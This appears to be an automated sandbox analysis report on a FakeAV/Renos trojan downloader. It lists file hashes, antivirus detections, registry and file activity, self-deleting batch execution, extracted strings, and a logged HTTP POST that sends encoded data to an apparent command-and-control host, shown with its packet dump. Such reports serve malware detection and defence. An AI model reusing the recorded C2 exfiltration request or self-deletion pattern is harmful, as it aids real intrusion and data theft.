Analysis Date: 2014-10-08 02:40:25
MD5: 61dc8812039bc04712057c99e899b914
SHA1: 7f271a37395cc002540b2b4e2c2f8c70f6c1d077

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .h84h md5: 4464cf41d566f2667187ab2a53b09148 sha1: 679468d3d9f260a82898051982d7bb52de1de401 size: 18944
Section .eh27 md5: f7e4c6335266d607fa12c708c93e79aa sha1: f1c6fa5247632c947d09380ab191f2b73353c993 size: 16384
Section .dh62 md5: f29dc4fee8f81db32c190c3922f60620 sha1: 34bdb6e3cb4b6b02817bc5c18103c8d9d2971005 size: 53760
Section .ae4a md5: bf868e648a3155e947f9fc7463fb930e sha1: 6c656e7d6a7b099fb601cafa607ad68942bf77bd size: 1536
Section .rsrc md5: 5e141145ea2dd2a1b16cd5b1d5df53ea sha1: a1d3bb574691ae28c24c97df9a6a1f4d11295db8 size: 1536
Timestamp: 2007-05-16 23:33:21
PEhash: dde107ca6d98921c5f42f78eceaa595d8fa61ed6
IMPhash: 9662eb3a53cf3848855081ee9b562058
AV 360 Safe: Gen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AV Ad-Aware: Gen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/FakeAlert.CO.gen!Eldorado
AV Avira (antivir): TR/Kazy.maklt
AV CA (E-Trust Ino): Win32/FakeAlert.AWJ
AV CAT (quickheal): Win32.Packed.Krap.ag.5
AV ClamAV: Win.Trojan.Fakeav-5226
AV Dr. Web: Trojan.Packed.706
AV Emsisoft: Gen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AV Eset (nod32): Win32/TrojanDownloader.FakeAlert.ADA
AV Fortinet: W32/Kryptik.AG!tr
AV Frisk (f-prot): W32/FakeAlert.CO.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.gen!N
AV Grisoft (avg): Generic34.AUSC
AV Ikarus: Trojan.Win32.FakeAV
AV K7: Trojan ( 00111bd81 )
AV Kaspersky: Trojan.Win32.FraudPack.zsn
AV MalwareBytes: no_virus
AV Mcafee: Downloader-BWS
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.JM
AV MicroWorld (escan): Gen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AV Norman: win32/SB/Obfuscated_M
AV Rising: Trojan.FraudPack!5474
AV Sophos: Mal/Krap-D
AV Symantec: Packed.Generic.268
AV Trend Micro: TROJ_FAKEAV.SMOP
AV VirusBlokAda (vba32): Trojan.MTA.0230
AV Yara APT: no_virus
AV Zillya!: Trojan.FraudPack.Win32.4917

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates Process: C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates File: nul
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Deletes File: C:\malware.exe

Network Details:

DNS: kinoarts.com
Type: A
192.31.186.4
DNS: petroartsstudio.com
Type: A
DNS: greeartsday.com
Type: A
HTTP POST: http://kinoarts.com/report.php?data=v26MmjSySdfyUzZ07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzbY+RtufRrKX/N/tqt+7rkA==
User-Agent: wget 3.0
Flows TCP: 192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   6679557a 5a303741 55595272 4d375937   fyUzZ07AUYRrM7Y7
0x00000030 (00048)   2f754939 45384f64 59495358 30694c42   /uI9E8OdYISX0iLB
0x00000040 (00064)   734f5751 61483242 58617954 33774255   sOWQaH2BXayT3wBU
0x00000050 (00080)   33436346 58656763 79557638 34554b51   3CcFXegcyUv84UKQ
0x00000060 (00096)   69424d46 3459476d 4c7a6259 2b527475   iBMF4YGmLzbY+Rtu
0x00000070 (00112)   6652724b 582f4e2f 7471742b 37726b41   fRrKX/N/tqt+7rkA
0x00000080 (00128)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000090 (00144)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x000000a0 (00160)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x000000b0 (00176)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000c0 (00192)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000d0 (00208)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000e0 (00224)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000f0 (00240)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x00000100 (00256)   74683a20 3132310d 0a436f6e 6e656374   th: 121..Connect
0x00000110 (00272)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d756a6e 5433324f 2f463971 73447941   =ujnT32O/F9qsDyA
0x00000150 (00336)   7a36566c 4d533735 33502f58 34664d4d   z6VlMS753P/X4fMM
0x00000160 (00352)   78523930 4e43436f 33645531 43485744   xR90NCCo3dU1CHWD
0x00000170 (00368)   5a303065 43324879 32625379 47513058   Z00eC2Hy2bSyGQ0X
0x00000180 (00384)   5431702f 572f5a49 614a6b2b 4f644441   T1p/W/ZIaJk+OdDA
0x00000190 (00400)   7a42324b 364c746d 52314c61 432f716e   zB2K6LtmR1LaC/qn
0x000001a0 (00416)   3949756b 362b3732 33775761 2f536b54   9Iuk6+723wWa/SkT
0x000001b0 (00432)   7248413d 3d                           rHA==


Strings
..N
...q.
.DA.
A6C0
BGAC5
BH6HGB
G7876E
GAB1
H070C7
	RC_RCDATA
RC_RCDATA2
RC_RCDATA3
RC_RCDATA4
0f161f21fc4e1gc6d4ecd
{0w=>-
1}"a)T
1he8h8e0hagc9ha4bfdgdfee878c7
2}tl0T
<}4'2"
4ebb90318ag6f90c7g4d7g6g629d57
8E*4;;;
|9;:4?
9d8gfcg896629f5f3b9ce75417hehfgd95g65838bede982698g06
advapi32.dll
AppendMenuA
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
Bu'joD
CreateDirectoryA
^Cwsp.
DeleteFileW
d|<g+80H
DLT\dX
{D-M4V
Dw"k}!
D(`Ylh
]D!-Z4
e3h6be725d4f109a31a3a
eDLyJP
EDmGgT
eg6chfcdc1fe1868caddbcf3bg680bdab5821
`.eh27
etWr;G
EWmGg&
ExitProcess
ExitThread
FindClose
FreeResource
>G( -'
GetCPInfo
GetFileTime
GetFileType
GetLastError
GetPriorityClass
GetStdHandle
GetWindowTextLengthA
gggy(i
Gi.Jy47$
HeapAlloc
HeapFree
*J\S%0
kernel32.dll
lstrcatA
lstrcmpA
mLSR6$
nojK<%/
OpenFile
OpenFileMappingA
_@Os5M
qhW:pBh
RegCreateKeyA
RegQueryValueExW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
@.rsrc
:SD<D7
      </security>
      <security>
!This program cannot be run in DOS mode.
TJ<*LS@
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
{ub+8:
user32.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
yD]q@$